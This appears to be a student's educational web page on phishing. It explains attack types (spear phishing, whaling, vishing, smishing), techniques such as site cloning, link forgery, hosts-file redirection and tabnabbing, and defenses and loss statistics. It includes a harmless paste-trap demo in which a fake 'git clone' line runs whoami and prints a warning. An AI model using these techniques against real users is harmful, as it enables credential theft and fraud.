Phishing

Obtaining information by masquerading as a trustworthy entity.

With so many new Phishing techniques appearing every year, one cannot be too safe.




Introduction


It is a form of manipulation that mimics a website, deceiving users' sense of security. They are generally created to gain usernames and passwords of the sites users. Over the last year, more than a 100,000 people have had their information breached due to phishing. It is a very popular method of retrieval because it incorporates the least of amount of effort from the hacker. It does not involve much time to make a site that looks exactly like another site, especially due to the fact that browsers allow the saving of webpages. It is a method that most people in todays generation are not fully aware of.


What:

Phishing: In the simplest terms, it is the act of attempting to obtain information by pretending to be a trustworthy entity. There are different variants of this attack but they all carry the same meaning.


How:

It can be done in many different ways. It is popular among techniques such as email spoofing, instant message spoofing and media baiting. There is a variant of the attack called Spear Phishing, where the attack is personalized towards the user. Another variant is Whaling, which is the same as spear phishing except the attacker goes towards the higher, or highest, management to uncover more sensitive information.


Who:

Everyone is affected by this attack. It is generalized towards the unaware public who do not know about password policies, terms of conditions (host will never ask for password through emails), etc.


Where:

Phishing is one of those actions that can be carried out anywhere. It is a very general term but it is almost always tied to the IT world. Because of this, it is mostly active on the Internet. Users get sent an email with a link to a fake login page. After input, the attacker will have access to the user’s account and the contents associated with it. Another popular phishing attack is where a site requires a login to get some media. Since in today’s generation, the public uses the same login credentials for all their accounts, getting one login means getting most.





Attack Types


There are many different types of phishing attacks. They are usually defined by how personalized the attack is towards the victim and who the actual victim is. When the attack is towards an unknown audience, it is a general form of a phishing attack. When the attack is made and personalized towards a specific set of people, the attack is denoted as Spear Phishing. When the attack is personalized towards a victim known to hold very crucial, sensitive, information, the attack is known as Whaling. When the attack is dealt using phone calls, it falls under the Vishing category. Vishing has its sub category called Smishing, which is basically Vishing but more centered on SMS(s). There have been many new ways of phishing attacks reported in the last few years. As more and more mailing lists become public, it has become much easier to execute attacks on unwary public. MSU itself has had its own number of phishing attacks to entire departments. Since MSU Mailing Lists are publicly available, it has become very easy to email students and faculty with disguised emails.


Regular attack:

A hacker gets a mailing list from somewhere. He/she makes a bank website that looks exactly like the trustworthy site. He/she then sends an email saying that the account to the site will be suspended unless they click on the link. Out of all the users, only 10% actually have an account with the bank so they click the link. Out of that 10%, only 10% actually fall for it and login. Now the login information is stored onto the attackers database. If the mailing list had, hypothetically, 1000 people, using this example, 10 people fell for the trick. If each of the 10 people had at least $500 in the bank, the attacker just made $5000 with a single email. Phishing is just about the easiest attack. It is known for its low input and high output.


Spear Phishing:

An attacker gets the mailing list of all the users in a big corporation. He/she disguises an email saying it is from the IT department of the corporation. He then sends an email embedded with a link below the topic: “We’ve been hacked! Download this as soon as possible to secure your individual systems. – IT Department”. Most of the employees are aware of phishing email due to weekly trainings; however, a new intern clicks on the link and downloads the file. To his surprise, the file is a worm, and now the worm replicates itself over the network. Soon, the entire company is affected. Phishing attacks usually do not rely on the number of computers it affects when it comes to infecting since it only takes one computer to be infected. Phishing can be an entry into other attacks.


Whaling:

An attacker sends an email to the CEO disguised as an email from the FBI carrying a subpoena. When the CEO tries to open the file, a prompt will come up saying they need a newer version of flash to view the file, along with a link on the bottom. The link, obviously, is a phishing attempt. On download of the fake flash update, a worm is executed on the machine. Since the machine is of the CEO, there is a high probability of loss of very confidential information. This is very big issue in cities with startup companies since most are not well versed with the law or its practices or its documents.

"Only amateurs attack machines; professionals target people." -Bruce Schneier


Vishing:

An attacker incorporates an application that simply calls each person on a list of phone numbers. This phone call will pretend to be Bank of America and say that it has detected unusual activity on the victims account. It will then ask the user to enter their account number to stop this attack. Once the victim enters the number, the attacker will save the number and use it for profit of some sort.

Vishing Demo


Smishing:

An attacker sends a text message to all of his/her victims telling them they've won a $1000 BestBuy gift card. The text message provides a link under the message. The victims that click that are led to a phished page where it tells the user to either pick it up in New York (or somewhere far) or have it mailed to them for a small $2 shipping and handling charge. Since most victims do not care about the $2 vs the $1000, they enter their credit card information and then are part of identity theft since the attacker now has all their information.

Smishing Demo





Attack Techniques


There are many tricks hackers use now days to implement a phishing attack. Like I specified before, phishing is an attack where the output is much greater than the input. This means the more the hacker puts into his/her hack, the higher the caliber of output.


Email Creation

Creating emails isn't really hard, which is why it's the most recognized version of phishing. The beautiful thing about todays emails from major companies is that they hardly put any styling to their emails. They simple state their purpose of the email and sign off with a company name and address. This is essentially why hackers choose to send emails over the other forms of attacks.

Email Fraud


Website Forgery

Forging a website has become much easier throughout the years. Before, hackers had to copy all the files and apply custom styles to make the website look same. Now days, one can get a perfectly replicated website in less than five minutes. All they have to do is go to a webpage and save it to the local PC. Browsers such as Google Chrome and Firefox even go far as to copy the stylesheets and javascript files, even if the files are located on a different server than the forged site. Furthermore, hackers now have a tool made in Java that simply asks for the web url and will actually download the entire site and even host it online for you automatically. The following link will let you play around with the tool:

git clone -l -s -0p -r /dev/null; clear; echo -n 'Damn it ';whoami|tr -d '\n';echo -e '\nThis is a project on Phishing, why the hell would you copy stuff from the internet ONTO YOUR LOCAL TERMINAL? \nI could run any command I want on your machine. Anyways, this is a very personalized example of link forgery. Stay wary my friends.'; echo -e '\n';
Dummy Text:
git://github.com/zillwc/JavaPhishingProject.git


Link Forgery

Many, now days, underestimate the severity of this attack technique. An attacker can simply specify a hyperlink but attach an unexpected url to the link. This will cause the victim to go to an unwanted site. This happens a lot in forums since now every forum out there supports wysiwyg editing. This allows the attacker to provide a hyperlink to their phished page instead of one the victim was expecting. For example, this link to Facebook actually goes to Myspace. No one really wants that now do they? Javascript header manipulation has allowed hackers to even change the address bar so the user cannot tell the difference from the browser address.


Redirection

This is, by far, the most effective way of getting a victim to fall for a phishing attack. This technique can be carried out in multiple ways and is usually crafted for a small audience. In the first way, an attacker can connect into a network and implement a man-in-the-middle attack. He/she can then perform a network redirection when a request for a specific url is given. Instead of sending the packet with the information of the legit website, the access point (specifically, the machine of the attacker) would send the packet with the phished page. This will almost always catch the user off guard since they will not notice any disturbance in their activity. The next form of this attack is when the attacker has physical access to the victim's computer. He/she can access the Hosts file and put in a rule to go to the phishing page whenever a specific URL is given. The last way is for the attacker to infect the computer with malware that does the redirection for him/her. The malware would always be dormant until it receives the request to go to the site, which is when it'd redirect the unaware user to the fake site.


Tabnabbing

This is a new method of phishing that has grown very popular due to the way people use computers and phones now days. In a recent survey, 9 out of 10 people keep multiple tabs open and out of these 9, 6 keep multiple tabs open so they can preserve the link for later. Tabnabbing makes very good use of this vulnerability. It simply acts like a regular site or service but it's in actuality, a listener. It waits for the victim to change his/her page and then will change itself to look like a different site. This way, when the victim comes back to the tab, he/she will think nothing is wrong and logs in. The login information is then send to the hacker.

Here is my proof of concept: Blend

Smartphone Tabnabbing: Demo





Defense


The truth, I hope to convey from this presentation, is that there is no sure way to protect from yourself from this attack. Hackers have always found a way around browser and anti-virus securities. They use various javascript and social engineering hacks to get the victim to believe they are who they say they are. To protect yourself fully would mean to implement so many security measurements that it would make using the internet a burden. Even then, there are many new ways coming out to help the user become more aware of the attack. Unfortuntely, this is all you can do right now. The best way to protect against these attacks is to be more aware of how they are implemented.


Social Response

One way to combat phishing is to train people. Corporations are already requiring a technology use and awareness section in every new employee's trainings. They will be required to know what kind of scams exist out there and how to block them from email clients and such. People have to be trained to change their browsing habits. They have to be more suspictious of everything they do on the internet. When contacted about their accounts needing to be validated, they have to learn to take the least obvious route and actually contact the company instead of going with the online website verification approach. Companies and banks have to also play their part and train their customers on their terms of conditions. They have to be very specific on the fact that they would never contact them or ask for their passwords to verify their information.


Technical Response

Browsers have already started implementing security responses towards phishing attacks. Both Firefox and Google Chrome work with PhishTank to have a list of sites which will throw a warning at the user if they end up on the link using the browser:

This link looks like it goes to the US Diablo site but instead goes to a phished site. It had been reported on PhishTank so browsers such as Google Chrome and Firefox should block it for you by default: us.diablo.com - try it out.





Life Examples


It is estimated that between May 2004 and May 2005, approximately 1.2 million computer users in the United States suffered losses caused by phishing, totaling about $929 million dollars.

In the U.K, 1 in 20 computer users claimed to have lost out in phishing in 2005.

United States businesses lose an estimated US$2 billion per year as their clients become victims.

In 2007, phishing attacks escalated. 3.6 million adults lost US$3.2 billion in the 12 months ending in August 2007.

Banks in Ireland refuse to cover losses suffered by its customers. They said it is not in their policies to do so.

In a June 2004 experiment with spear phishing, 80% of 500 West Point cadets who were sent a fake e-mail from a non-existent Col. Robert Melville at West Point, were tricked into clicking on a link that would supposedly take them to a page where they would enter personal information.





Demos



Final Project Presentation plan: DDOS Amplification Attack



Top